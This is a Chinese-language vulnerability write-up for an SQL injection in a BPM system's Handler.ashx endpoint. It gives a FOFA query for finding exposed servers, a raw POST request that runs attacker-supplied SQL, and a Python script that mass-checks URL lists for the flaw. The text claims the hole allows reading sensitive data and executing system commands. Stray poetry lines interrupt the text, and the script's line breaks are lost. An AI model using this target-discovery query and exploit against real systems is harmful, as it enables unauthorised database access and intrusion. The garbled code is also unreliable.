声明:本文档或演示材料仅供教育和教学目的使用,任何个人或组织使用本文档中的信息进行非法活动,均与本文档的作者或发布者无关。
文章目录
- 漏洞描述
- 漏洞复现
- 测试工具
漏洞描述
某骋BPM系统是一款功能全面的商业流程管理平台,旨在帮助企业实现业务流程的自动化和优化。该系统集成了工作流引擎、表单设计、报表分析等核心功能,可以帮助企业快速建立起标准化的业务流程,提高工作效率和管理透明度。某骋BPM支持多种行业应用场景,如采购审批、费用报销、合同管理等,拥有丰富的行业模板,能够快速部署上线。同时,系统提供可视化的流程建模工具,让业务人员也能轻松参与流程设计和优化。凭借强大的功能和出色的用户体验,驰骋BPM助力企业实现数字化转型,提升整体运营管理水平。其接口Handler.ashx存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息,也可通过数据库执行系统命令。
漏洞复现
信息收集
fofa:body="BP.WF.HttpHandler.WF_Portal"
清江一曲抱村流,长夏江村事事幽。
构造数据包
POST /WF/Comm/Handler.ashx?DoType=RunSQL_Init HTTP/1.1
Host:ip
User-Agent: Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36
Content-Type: multipart/form-data; boundary=----3Vn7mG2Td4Aq6Ew8Zj9Px5Bh1
Content-Length: 147------3Vn7mG2Td4Aq6Ew8Zj9Px5Bh1
Content-Disposition: form-data; name="SQL"SELECT HASHBYTES('MD5', '123456')
------3Vn7mG2Td4Aq6Ew8Zj9Px5Bh1--
成功回显,证明漏洞存在。
测试工具
poc
import requests
import urllib3
from urllib.parse import urljoin,quote
import argparse
import ssl
import re
ssl._create_default_https_context = ssl._create_unverified_context
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)def read_file(file_path):with open(file_path, 'r') as file:urls = file.read().splitlines()return urlsdef check(url):url = url.rstrip("/")target = urljoin(url, "/WF/Comm/Handler.ashx?DoType=RunSQL_Init")headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36","Content-Type": "multipart/form-data; boundary=----3Vn7mG2Td4Aq6Ew8Zj9Px5Bh1"}data='------3Vn7mG2Td4Aq6Ew8Zj9Px5Bh1\r\nContent-Disposition: form-data; name="SQL"\r\n\r\nSELECT HASHBYTES(\'MD5\', \'123456\')\r\n------3Vn7mG2Td4Aq6Ew8Zj9Px5Bh1--'try:response = requests.post(target, verify=False, headers=headers, timeout=5,data=data)if response.status_code == 200 and '4QrcOUm6Wau+VuBX8g+IPg==' in response.text :print(f"\033[31mDiscovered:{url}: CCBPM_Handler_Init_SQLInject!\033[0m")return Trueexcept Exception as e:passif __name__ == "__main__":parser = argparse.ArgumentParser()parser.add_argument("-u", "--url", help="URL")parser.add_argument("-f", "--txt", help="file")args = parser.parse_args()url = args.urltxt = args.txtif url:check(url)elif txt:urls = read_file(txt)for url in urls:check(url)else:print("help")
运行截图
人们之所以会怀念故乡,是因为心爱的人就在故乡。
